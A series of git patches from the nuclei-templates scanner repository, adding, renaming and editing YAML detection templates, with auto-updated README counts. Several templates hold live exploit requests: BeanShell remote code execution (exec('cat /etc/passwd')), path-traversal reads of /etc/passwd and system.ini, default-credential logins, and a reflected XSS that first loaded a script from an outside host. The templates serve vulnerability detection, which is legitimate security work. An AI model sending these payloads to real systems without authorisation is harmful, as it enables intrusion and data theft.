+- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml index 71f4584cb5..50bcb9d651 100644 --- a/default-logins/apache/airflow-default-credentials.yaml +++ b/default-logins/apache/airflow-default-credentials.yaml @@ -1,7 +1,7 @@ id: airflow-default-credentials info: - name: Apache Airflwo Default Credentials + name: Apache Airflow Default Credentials author: pdteam severity: critical tags: airflow,default-login From 258f7d7af8f2cbedb49ea87da6a1b4e81039815e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:09:10 +0530 Subject: [PATCH 110/144] Update dotcms-admin-panel.yaml --- exposed-panels/dotcms-admin-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml index d873386ea3..e1846393d7 100644 --- a/exposed-panels/dotcms-admin-panel.yaml +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -1,6 +1,6 @@ id: dotcms-admin-panel -info: +info: name: dotcms-admin-panel author: impramodsargar severity: info @@ -13,6 +13,6 @@ requests: matchers-condition: and matchers: - - type: word - words: + - type: word + words: - 'dotCMS Content Management Platform' From b5b4ba8e2433c8eb73b4540a0f15897205e2b803 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:09:35 +0530 Subject: [PATCH 111/144] Update dotcms-admin-panel.yaml --- exposed-panels/dotcms-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml index e1846393d7..15846058a0 100644 --- a/exposed-panels/dotcms-admin-panel.yaml +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -1,7 +1,7 @@ id: dotcms-admin-panel info: - name: dotcms-admin-panel + name: dotAdmin Panel author: impramodsargar severity: info tags: panel From d29b32720d209407b26a4e9e1f5ec1208806f7db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 15:42:52 +0000 Subject: [PATCH 112/144] Auto Update README [Thu Jun 3 15:42:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1b5f3c8e91..7c7ad57715 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 177 | exposed-panels | 144 | +| cves | 325 | vulnerabilities | 177 | exposed-panels | 145 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1192 files**. +**110 directories, 1193 files**. From 4e9d0ae79a084063caf0d16d526f80ebb07a4cb6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:14:13 +0530 Subject: [PATCH 113/144] Update nc-bsh-servlet-rce.yaml --- vulnerabilities/other/nc-bsh-servlet-rce.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/vulnerabilities/other/nc-bsh-servlet-rce.yaml index 295ceae036..ba11421301 100644 --- a/vulnerabilities/other/nc-bsh-servlet-rce.yaml +++ b/vulnerabilities/other/nc-bsh-servlet-rce.yaml @@ -35,5 +35,4 @@ requests: - type: status status: - - 200 - + - 200 \ No newline at end of file From 0f0ff2ee1e252c391420d85c4f94115bdc157ec0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:54:08 +0530 Subject: [PATCH 114/144] moving files around --- .../CNVD-2019-01348.yaml | 5 +++-- .../xunchi-file-read.yaml => cnvd/CNVD-2020-23735.yaml | 10 ++++++---- .../CNVD-2020-56167.yaml | 4 ++-- {vulnerabilities/other => cnvd}/CNVD-2020-62422.yaml | 2 +- .../CNVD-2020-68596.yaml | 4 ++-- .../eea-disclosure.yaml => cnvd/CNVD-2021-10543.yaml | 4 ++-- .../CNVD-2021-17369.yaml | 4 ++-- 7 files changed, 18 insertions(+), 15 deletions(-) rename vulnerabilities/other/xiuno-bbs-reinstallation.yaml => cnvd/CNVD-2019-01348.yaml (94%) rename vulnerabilities/other/xunchi-file-read.yaml => cnvd/CNVD-2020-23735.yaml (85%) rename default-logins/smartweb/ruijie-smartweb-default-password.yaml => cnvd/CNVD-2020-56167.yaml (90%) rename {vulnerabilities/other => cnvd}/CNVD-2020-62422.yaml (94%) rename vulnerabilities/other/weiphp-path-traversal.yaml => cnvd/CNVD-2020-68596.yaml (95%) rename exposures/configs/eea-disclosure.yaml => cnvd/CNVD-2021-10543.yaml (90%) rename exposures/configs/ruijie-smartweb-disclosure.yaml => cnvd/CNVD-2021-17369.yaml (90%) diff --git a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml b/cnvd/CNVD-2019-01348.yaml similarity index 94% rename from vulnerabilities/other/xiuno-bbs-reinstallation.yaml rename to cnvd/CNVD-2019-01348.yaml index fd4ad35902..4102e9234e 100644 --- a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml +++ b/cnvd/CNVD-2019-01348.yaml @@ -1,11 +1,12 @@ -id: xiuno-bbs-reinstallation +id: CNVD-2019-01348 + info: name: Xiuno BBS CNVD-2019-01348 author: princechaddha severity: medium description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 - tags: xiuno + tags: xiuno,cnvd requests: - method: GET diff --git a/vulnerabilities/other/xunchi-file-read.yaml b/cnvd/CNVD-2020-23735.yaml similarity index 85% rename from vulnerabilities/other/xunchi-file-read.yaml rename to cnvd/CNVD-2020-23735.yaml index cc804905e3..88cf7d0df7 100644 --- a/vulnerabilities/other/xunchi-file-read.yaml +++ b/cnvd/CNVD-2020-23735.yaml @@ -1,16 +1,18 @@ -id: xunchi-file-read +id: CNVD-2020-23735 + info: - name: Xxunchi LFR (CNVD-2019-01348 + name: Xxunchi Local File read author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. reference: https://www.cnvd.org.cn/flaw/show/2025171 - tags: xunchi,lfi + tags: xunchi,lfi,cnvd requests: - method: GET path: - "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php" + matchers-condition: and matchers: - type: status @@ -21,4 +23,4 @@ requests: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" part: body - condition: and + condition: and \ No newline at end of file diff --git a/default-logins/smartweb/ruijie-smartweb-default-password.yaml b/cnvd/CNVD-2020-56167.yaml similarity index 90% rename from default-logins/smartweb/ruijie-smartweb-default-password.yaml rename to cnvd/CNVD-2020-56167.yaml index 099edceff0..1fe06f6c1c 100644 --- a/default-logins/smartweb/ruijie-smartweb-default-password.yaml +++ b/cnvd/CNVD-2020-56167.yaml @@ -1,11 +1,11 @@ -id: ruijie-smartweb-default-password +id: CNVD-2020-56167 info: name: Ruijie Smartweb Default Password author: pikpikcu severity: low reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - tags: ruijie,default-login + tags: ruijie,default-login,cnvd requests: - method: POST diff --git a/vulnerabilities/other/CNVD-2020-62422.yaml b/cnvd/CNVD-2020-62422.yaml similarity index 94% rename from vulnerabilities/other/CNVD-2020-62422.yaml rename to cnvd/CNVD-2020-62422.yaml index 19715aaafb..736770f82c 100644 --- a/vulnerabilities/other/CNVD-2020-62422.yaml +++ b/cnvd/CNVD-2020-62422.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium reference: https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi + tags: lfi,cnvd requests: - method: GET diff --git a/vulnerabilities/other/weiphp-path-traversal.yaml b/cnvd/CNVD-2020-68596.yaml similarity index 95% rename from vulnerabilities/other/weiphp-path-traversal.yaml rename to cnvd/CNVD-2020-68596.yaml index b50c3ba268..9f1c78f053 100644 --- a/vulnerabilities/other/weiphp-path-traversal.yaml +++ b/cnvd/CNVD-2020-68596.yaml @@ -1,11 +1,11 @@ -id: weiphp-path-traversal +id: CNVD-2020-68596 info: name: WeiPHP 5.0 Path Traversal author: pikpikcu severity: critical reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html - tags: weiphp,lfi + tags: weiphp,lfi,cnvd requests: - raw: diff --git a/exposures/configs/eea-disclosure.yaml b/cnvd/CNVD-2021-10543.yaml similarity index 90% rename from exposures/configs/eea-disclosure.yaml rename to cnvd/CNVD-2021-10543.yaml index 459b5ea63a..a29fe66f5a 100644 --- a/exposures/configs/eea-disclosure.yaml +++ b/cnvd/CNVD-2021-10543.yaml @@ -1,11 +1,11 @@ -id: eea-disclosure +id: CNVD-2021-10543 info: name: EEA Information Disclosure author: pikpikcu severity: high reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure + tags: config,exposure,cnvd requests: - method: GET diff --git a/exposures/configs/ruijie-smartweb-disclosure.yaml b/cnvd/CNVD-2021-17369.yaml similarity index 90% rename from exposures/configs/ruijie-smartweb-disclosure.yaml rename to cnvd/CNVD-2021-17369.yaml index 47bf5c2ed1..8377c8296c 100644 --- a/exposures/configs/ruijie-smartweb-disclosure.yaml +++ b/cnvd/CNVD-2021-17369.yaml @@ -1,11 +1,11 @@ -id: ruijie-smartweb-disclosure +id: CNVD-2021-17369 info: name: Ruijie Smartweb Management System Password Information Disclosure author: pikpikcu severity: medium reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - tags: ruijie,disclosure + tags: ruijie,disclosure,cnvd requests: - method: GET From 45a846baaebb648827a617f1ced000ee5391fe24 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 16:27:57 +0000 Subject: [PATCH 115/144] Auto Update README [Thu Jun 3 16:27:57 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 7c7ad57715..ac78cecadc 100644 --- a/README.md +++ b/README.md @@ -38,10 +38,10 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 177 | exposed-panels | 145 | -| takeovers | 67 | exposures | 106 | technologies | 97 | +| cves | 325 | vulnerabilities | 173 | exposed-panels | 145 | +| takeovers | 67 | exposures | 104 | technologies | 97 | | misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | -| default-logins | 30 | exposed-tokens | 0 | dns | 9 | +| default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | **110 directories, 1193 files**. From 3ee10413747149185a51bb60416d56784f87f932 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 22:47:18 +0530 Subject: [PATCH 116/144] misc changes --- .../CNVD-2021-30167.yaml | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) rename vulnerabilities/other/nc-bsh-servlet-rce.yaml => cnvd/CNVD-2021-30167.yaml (66%) diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/cnvd/CNVD-2021-30167.yaml similarity index 66% rename from vulnerabilities/other/nc-bsh-servlet-rce.yaml rename to cnvd/CNVD-2021-30167.yaml index ba11421301..4302b87a88 100644 --- a/vulnerabilities/other/nc-bsh-servlet-rce.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -1,11 +1,13 @@ -id: nc-bsh-servlet-rce +id: CNVD-2021-30167 info: - name: NC bsh.servlet.BshServlet RCE + name: UFIDA NC BeanShell Remote Code Execution author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - tags: beanshell,rce + reference: | + - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A + - https://www.cnvd.org.cn/webinfo/show/6491 + tags: beanshell,rce,cnvd requests: - raw: @@ -15,7 +17,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - bsh.script=exec("cat /etc/passwd"); + bsh.script=exec("id"); - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 @@ -30,8 +32,13 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "uid=" - "Windows IP" + condition: or + + - type: word + words: + - "BeanShell Test Servlet" - type: status status: From e537467a5510e6bff00825852f2f3a5edfc2a7b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 17:20:14 +0000 Subject: [PATCH 117/144] Auto Update README [Thu Jun 3 17:20:14 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ac78cecadc..9a7fa7f958 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1193 files**. +**110 directories, 1194 files**. From 0e3ed049ae1517d0f454ebbba30bfafa77282c97 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 23:00:47 +0530 Subject: [PATCH 118/144] misc changes --- cves/2020/CVE-2020-6308.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index a9d1af9ed2..b29b3eee67 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -11,7 +11,6 @@ requests: - method: POST path: - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' - - '{{BaseURL}}:8080/AdminTools/querybuilder/logon?framework=' body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp From 8c1c7787afc0b50b9cfa2891126a6c8e404dd269 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 21:10:16 +0000 Subject: [PATCH 119/144] Auto Update README [Thu Jun 3 21:10:16 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 9a7fa7f958..898bef1067 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 173 | exposed-panels | 145 | -| takeovers | 67 | exposures | 104 | technologies | 97 | -| misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | -| default-logins | 29 | exposed-tokens | 0 | dns | 9 | +| cves | 327 | vulnerabilities | 173 | exposed-panels | 145 | +| takeovers | 67 | exposures | 104 | technologies | 98 | +| misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | +| default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1194 files**. +**111 directories, 1199 files**. From bc9a760d293ac56e7cc2c1f62a94893ed5ac38b0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 4 Jun 2021 02:54:55 +0000 Subject: [PATCH 120/144] Create interlib-fileread.yaml --- vulnerabilities/other/interlib-fileread.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/interlib-fileread.yaml diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml new file mode 100644 index 0000000000..32be6e4dbb --- /dev/null +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -0,0 +1,27 @@ +id: interlib-fileread + +info: + name: Interlib Fileread + author: pikpikcu + severity: high + reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: interlib,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" + - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\Windows\system.ini" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + - "for 16-bit" + condition: and + + - type: status + status: + - 200 From c5b445e1ecff093f4190132eb1a4b69ad9dce7d5 Mon Sep 17 00:00:00 2001 From: savik Date: Fri, 4 Jun 2021 10:17:20 +0300 Subject: [PATCH 121/144] Update ruijie-workflow.yaml --- workflows/ruijie-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml index 5ba69854c5..086cd7d125 100644 --- a/workflows/ruijie-workflow.yaml +++ b/workflows/ruijie-workflow.yaml @@ -6,9 +6,9 @@ info: description: A simple workflow that runs all Ruijie related nuclei templates on a given target. workflows: - - template: default-logins/smartweb/ruijie-smartweb-default-password.yaml + - template: cnvd/CNVD-2021-17369.yaml - template: vulnerabilities/other/ruijie-networks-lfi.yaml - template: vulnerabilities/other/ruijie-networks-rce.yaml - template: exposures/configs/ruijie-information-disclosure.yaml - - template: exposures/configs/ruijie-smartweb-disclosure.yaml + - template: cnvd/CNVD-2020-56167.yaml - template: exposures/configs/ruijie-phpinfo.yaml From 2171f7ec21f1fb87be3ed9ed62489d96d3e87671 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 4 Jun 2021 18:28:45 +0900 Subject: [PATCH 122/144] Create CVE-2021-24316.yaml --- CVE-2021-24316.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 CVE-2021-24316.yaml diff --git a/CVE-2021-24316.yaml b/CVE-2021-24316.yaml new file mode 100644 index 0000000000..9523dbbcab --- /dev/null +++ b/CVE-2021-24316.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24316 + +info: + author: 0x_Akoko + description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. + name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress + severity: medium + tags: Mediumish,xss,wordpress + reference: | + - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316 + +requests: + - method: GET + path: + ## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own. + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header From 8e13733d343978d0320de5f751f8a355895b149d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 16:30:31 +0530 Subject: [PATCH 123/144] moving files around --- .../2021/CVE-2021-24316.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) rename CVE-2021-24316.yaml => cves/2021/CVE-2021-24316.yaml (53%) diff --git a/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml similarity index 53% rename from CVE-2021-24316.yaml rename to cves/2021/CVE-2021-24316.yaml index 9523dbbcab..00b724d223 100644 --- a/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml @@ -5,16 +5,16 @@ info: description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress severity: medium - tags: Mediumish,xss,wordpress + tags: cve,cve2021,mediumish,xss,wordpress reference: | - - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316 + - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e + - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt requests: - method: GET path: - ## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own. - - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E' - + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E ' + matchers-condition: and matchers: - type: status @@ -23,8 +23,10 @@ requests: - type: word words: - - "" + - "" + - "Sorry, no posts matched your criteria." part: body + condition: and - type: word words: From b138c11548b4463269e6a7b19a9cd14ed271cef9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 16:32:49 +0530 Subject: [PATCH 124/144] wordpress workflow update --- workflows/wordpress-workflow.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index d94b0ef9da..09d2866f30 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -32,4 +32,5 @@ workflows: - template: cves/2020/CVE-2020-35489.yaml - template: cves/2021/CVE-2021-24146.yaml - template: cves/2021/CVE-2021-24176.yaml + - template: cves/2021/CVE-2021-24316.yaml - template: vulnerabilities/wordpress/ \ No newline at end of file From aaa00868682fa3fa457628779af4557abaadd538 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 11:03:26 +0000 Subject: [PATCH 125/144] Auto Update README [Fri Jun 4 11:03:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 898bef1067..a5d258488f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 327 | vulnerabilities | 173 | exposed-panels | 145 | +| cves | 328 | vulnerabilities | 173 | exposed-panels | 145 | | takeovers | 67 | exposures | 104 | technologies | 98 | | misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**111 directories, 1199 files**. +**111 directories, 1200 files**. From b6396aa3109db5513409ba1c51b46f2a6ce3ea10 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 18:50:38 +0530 Subject: [PATCH 126/144] Added zend-config-file --- exposures/configs/zend-config-file.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/configs/zend-config-file.yaml diff --git a/exposures/configs/zend-config-file.yaml b/exposures/configs/zend-config-file.yaml new file mode 100644 index 0000000000..8c3039bfeb --- /dev/null +++ b/exposures/configs/zend-config-file.yaml @@ -0,0 +1,27 @@ +id: zend-config-file + +info: + name: Zend Configuration File + author: pdteam + severity: high + tags: config,exposure,zend,php + +requests: + - method: GET + path: + - "{{BaseURL}}/application/configs/application.ini" + + matchers-condition: and + matchers: + - type: word + words: + - "resources.db.params.password" + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From f6fb88c5371813bf9465a8389cbc1cd97bdaf089 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 14:11:23 +0000 Subject: [PATCH 127/144] Auto Update README [Fri Jun 4 14:11:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a5d258488f..444656f365 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 328 | vulnerabilities | 173 | exposed-panels | 145 | -| takeovers | 67 | exposures | 104 | technologies | 98 | +| takeovers | 67 | exposures | 105 | technologies | 98 | | misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**111 directories, 1200 files**. +**111 directories, 1201 files**. From e2555d69d1c58fc13e90749261a44c38bf99f23a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 19:59:41 +0530 Subject: [PATCH 128/144] minor improvements --- exposures/configs/exposed-bzr.yaml | 7 ++++++- exposures/configs/exposed-svn.yaml | 12 ++++++------ 2 files changed, 12 insertions(+), 7 deletions(-) diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index 5f00619d9e..c90b3457cd 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml @@ -18,8 +18,13 @@ requests: words: - "parent_location" - "push_location" - condition: and + condition: or - type: status status: - 200 + + - type: word + part: header + words: + - "text/plain" \ No newline at end of file diff --git a/exposures/configs/exposed-svn.yaml b/exposures/configs/exposed-svn.yaml index b88ce042e1..7be0564837 100644 --- a/exposures/configs/exposed-svn.yaml +++ b/exposures/configs/exposed-svn.yaml @@ -4,14 +4,12 @@ info: name: Exposed SVN Directory author: udit_thakkur & dwisiswant0 severity: medium - tags: config,exposure + tags: config,exposure,svn requests: - method: GET path: - "{{BaseURL}}/.svn/entries" - - "{{BaseURL}}/.svn/prop-base/" - - "{{BaseURL}}/.svn/text-base/" matchers-condition: and matchers: @@ -19,10 +17,12 @@ requests: part: body regex: - "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))" + - type: status status: - 200 - - type: dsl - dsl: - - 'contains(tolower(body), "") == false' \ No newline at end of file + - type: word + part: header + words: + - "text/plain" \ No newline at end of file From 5efa716b73bf402a80d3fa8ccfd7e28c56d67ffa Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:24:08 +0530 Subject: [PATCH 129/144] Added epson-wf-series --- iot/epson-wf-series.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 iot/epson-wf-series.yaml diff --git a/iot/epson-wf-series.yaml b/iot/epson-wf-series.yaml new file mode 100644 index 0000000000..7dbf211998 --- /dev/null +++ b/iot/epson-wf-series.yaml @@ -0,0 +1,23 @@ +id: epson-wf-series + +info: + name: Epson WF Series Detection + author: aashiq + severity: info + description: Searches for Epson WF series printers on the domain + tags: iot,printer + +requests: + - method: GET + path: + - "{{BaseURL}}/PRESENTATION/HTML/TOP/PRTINFO.HTML" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "SEIKO EPSON" \ No newline at end of file From f2e5578ae5a2b8b6ab10f38519834ded573d8677 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:29:36 +0530 Subject: [PATCH 130/144] Added LuCi Login Detector --- exposed-panels/luci-login-detection.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/luci-login-detection.yaml diff --git a/exposed-panels/luci-login-detection.yaml b/exposed-panels/luci-login-detection.yaml new file mode 100644 index 0000000000..0824c5021a --- /dev/null +++ b/exposed-panels/luci-login-detection.yaml @@ -0,0 +1,23 @@ +id: luci-login-detection + +info: + name: LuCi Login Detector + author: aashiq + severity: info + description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint + tags: login + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/luci" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Authorization Required" From 76bd8824a5cbe5c5b39ce213a85afca281129f3d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: 